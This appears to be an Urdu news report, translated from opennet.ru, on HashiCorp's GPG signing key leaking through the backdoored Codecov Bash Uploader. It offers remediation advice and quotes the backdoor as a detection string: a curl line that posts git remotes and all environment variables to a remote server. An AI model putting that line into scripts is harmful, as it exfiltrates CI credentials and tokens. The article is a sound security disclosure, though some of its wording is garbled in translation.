HashiCorp، جو اوپن سورس ٹولز Vagrant، Packer، Nomad اور Terraform تیار کرنے کے لیے جانا جاتا ہے، نے ڈیجیٹل دستخط بنانے کے لیے استعمال ہونے والی نجی GPG کلید کے لیک ہونے کا اعلان کیا جو ریلیز کی تصدیق کرتے ہیں۔ حملہ آور جنہوں نے GPG کلید تک رسائی حاصل کی ہے وہ ممکنہ طور پر HashiCorp پروڈکٹس میں ان کی درست ڈیجیٹل دستخط سے تصدیق کر کے ان میں پوشیدہ تبدیلیاں کر سکتے ہیں۔ اسی وقت، کمپنی نے کہا کہ آڈٹ کے دوران، اس طرح کی ترمیم کرنے کی کوششوں کے نشانات کی نشاندہی نہیں کی گئی.
فی الحال، سمجھوتہ شدہ GPG کلید کو منسوخ کر دیا گیا ہے اور اس کی جگہ ایک نئی کلید متعارف کرائی گئی ہے۔ اس مسئلے نے صرف SHA256SUM اور SHA256SUM.sig فائلوں کا استعمال کرتے ہوئے تصدیق کو متاثر کیا، اور ریلیز.hashicorp.com کے ذریعے فراہم کردہ لینکس DEB اور RPM پیکجوں کے لیے ڈیجیٹل دستخطوں کی جنریشن کو متاثر نہیں کیا، نیز macOS اور Windows (AuthentiCode) کے لیے ریلیز کی تصدیق کے طریقہ کار کو متاثر نہیں کیا۔ .
یہ لیک انفراسٹرکچر میں Codecov Bash Uploader (codecov-bash) اسکرپٹ کے استعمال کی وجہ سے ہوا، جو مسلسل انضمام کے نظام سے کوریج رپورٹس کو ڈاؤن لوڈ کرنے کے لیے ڈیزائن کیا گیا ہے۔ Codecov کمپنی پر حملے کے دوران مخصوص اسکرپٹ میں ایک بیک ڈور چھپا ہوا تھا، جس کے ذریعے حملہ آوروں کے سرور پر پاس ورڈ اور انکرپشن کیز بھیجی جاتی تھیں۔
ہیک کرنے کے لیے، حملہ آوروں نے Codecov Docker امیج بنانے کے عمل میں غلطی کا فائدہ اٹھایا، جس نے انہیں GCS (Google Cloud Storage) تک رسائی کا ڈیٹا نکالنے کی اجازت دی، جو codecov.io سے تقسیم کردہ Bash اپلوڈر اسکرپٹ میں تبدیلیاں کرنے کے لیے ضروری تھا۔ ویب سائٹ یہ تبدیلیاں 31 جنوری کو کی گئی تھیں، دو ماہ تک ان کا پتہ نہیں چل سکا اور حملہ آوروں کو صارف کے مسلسل انضمام کے نظام کے ماحول میں ذخیرہ شدہ معلومات نکالنے کی اجازت دی۔ اضافی نقصان دہ کوڈ کا استعمال کرتے ہوئے، حملہ آور آزمائشی Git ریپوزٹری اور تمام ماحولیاتی متغیرات کے بارے میں معلومات حاصل کر سکتے ہیں، بشمول ٹوکنز، انکرپشن کیز اور پاس ورڈز جو مسلسل انٹیگریشن سسٹمز میں منتقل کیے جاتے ہیں تاکہ ایپلیکیشن کوڈ، ریپوزٹریز اور سروسز جیسے Amazon Web Services اور GitHub تک رسائی کو منظم کیا جا سکے۔
براہ راست کال کے علاوہ، Codecov Bash Uploader اسکرپٹ کو دوسرے اپ لوڈرز کے حصے کے طور پر استعمال کیا گیا، جیسے Codecov-action (Github)، Codecov-circleci-orb اور Codecov-bitrise-step، جن کے صارفین بھی اس مسئلے سے متاثر ہوتے ہیں۔ codecov-bash اور متعلقہ مصنوعات کے تمام صارفین کو اپنے انفراسٹرکچر کا آڈٹ کرنے کے ساتھ ساتھ پاس ورڈ اور انکرپشن کیز کو تبدیل کرنے کی سفارش کی جاتی ہے۔ آپ اسکرپٹ میں بیک ڈور کی موجودگی کو لائن curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// کی موجودگی سے چیک کر سکتے ہیں۔ /upload/v2 || سچ
ماخذ: opennet.ru